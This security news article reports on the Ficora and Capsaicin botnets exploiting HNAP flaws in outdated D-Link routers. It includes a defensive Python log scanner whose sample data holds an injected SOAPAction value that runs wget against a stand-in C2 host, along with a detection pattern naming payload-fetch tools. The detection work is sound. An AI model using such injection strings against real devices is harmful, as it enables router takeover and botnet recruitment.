Two botnets, tracked as “Ficora” and “Capsaicin,” have been observed ramping up attacks on outdated and end-of-life D-Link routers, according to Fortinet’s researchers.
Among the targeted models are popular D-Link routers widely used by both individuals and organizations, including the DIR-645, DIR-806, GO-RT-AC750 and DIR-845L. For initial access, the attackers exploit known vulnerabilities such as CVE-2015-2051.
Once a device is compromised, the botnets take advantage of flaws in D-Link's management interface, specifically the HNAP (Home Network Administration Protocol), to execute malicious commands via the GetDeviceSettings action.
Both botnets are capable of stealing data, executing shell scripts and launching distributed denial-of-service (DDoS) attacks.
Ficora appears to be a new variant of the notorious Mirai botnet, optimized to exploit vulnerabilities specific to D-Link routers. Fortinet's telemetry data shows that Ficora's activity spreads across the globe, with a notable focus on Japan and the United States. Two activity surges were recorded in October and November 2024.
After gaining access, Ficora deploys a shell script named 'multi', which downloads and executes its payload using multiple methods such as wget, curl, ftpget and tftp. The malware also includes a brute-force component with hard-coded credentials, enabling it to spread to other Linux-based devices. Ficora's DDoS capabilities include UDP flooding, TCP flooding and DNS amplification.
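As an added illustration (not code from Fortinet's report or either botnet), the following Python scans constructed web-access-log lines for the HNAP abuse described above: POST requests to /HNAP1/ whose SOAPAction names GetDeviceSettings but carries trailing shell metacharacters, or contains one of the fetch tools and payload names attributed to Ficora and Capsaicin. The log format, the placement of the SOAPAction header as the last quoted field, and the sample addresses and host names are assumptions.

```python
import re
from typing import NamedTuple, Optional

# Constructed access-log lines in combined format with the SOAPAction header
# appended as a final quoted field; these are not from the article and the
# addresses and host names are placeholders.
SAMPLE_LOGS = [
    '198.51.100.7 - - [12/Nov/2024:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 '
    '"http://purenetworks.com/HNAP1/GetDeviceSettings"',
    '198.51.100.7 - - [12/Nov/2024:10:01:05 +0000] "POST /HNAP1/ HTTP/1.1" 200 64 '
    '"http://purenetworks.com/HNAP1/GetDeviceSettings/; wget http://EXAMPLE-C2/multi"',
    '203.0.113.9 - - [12/Nov/2024:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-"',
    'truncated junk that should be skipped, not crash the scanner',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<soapaction>[^"]*)"$')
# A legitimate HNAP SOAPAction is just the action URI: nothing may follow the action name.
HNAP_ACTION_RE = re.compile(r'^http://purenetworks\.com/HNAP1/(?P<action>[A-Za-z]+)/?$')
SHELL_META_RE = re.compile(r'[;|&`$(){}<>\s]')
# Fetch tools and payload names the article attributes to Ficora and Capsaicin.
PAYLOAD_RE = re.compile(r'\b(?:wget|curl|ftpget|tftp|yakuza)\b|\bbins\.sh\b|/multi\b')

class Finding(NamedTuple):
    ip: str
    ts: str
    reasons: tuple

def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding for an HNAP GetDeviceSettings request carrying injection or
    payload-fetch indicators, else None (malformed and benign lines are skipped)."""
    m = LOG_RE.match(line)
    if not m or not m['path'].startswith('/HNAP1'):
        return None
    soap = m['soapaction']
    if 'GetDeviceSettings' not in soap:
        return None
    reasons = []
    if not HNAP_ACTION_RE.match(soap):
        trailing = soap.split('GetDeviceSettings', 1)[1]
        if SHELL_META_RE.search(trailing):
            reasons.append('shell metacharacters after GetDeviceSettings')
    hit = PAYLOAD_RE.search(soap)
    if hit:
        reasons.append('payload-fetch indicator: ' + hit.group(0))
    return Finding(m['ip'], m['ts'], tuple(reasons)) if reasons else None

def scan(lines) -> list:
    """Run inspect_line over a log and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f is not None]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOGS):
        print(f.ts, f.ip, '; '.join(f.reasons))
```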
Capsaicin, linked to the Keksec group known for malware such as EnemyBot, was first spotted in October 2024, primarily targeting East Asian countries. The botnet uses a downloader script ("bins.sh") to fetch binaries with the prefix 'yakuza' for various architectures, including ARM, MIPS, SPARC and x86.
Capsaicin is capable of disabling other botnet payloads active on the same device. In addition to DDoS capabilities similar to Ficora’s, Capsaicin can gather host information and exfiltrate it to its command-and-control (C2) server.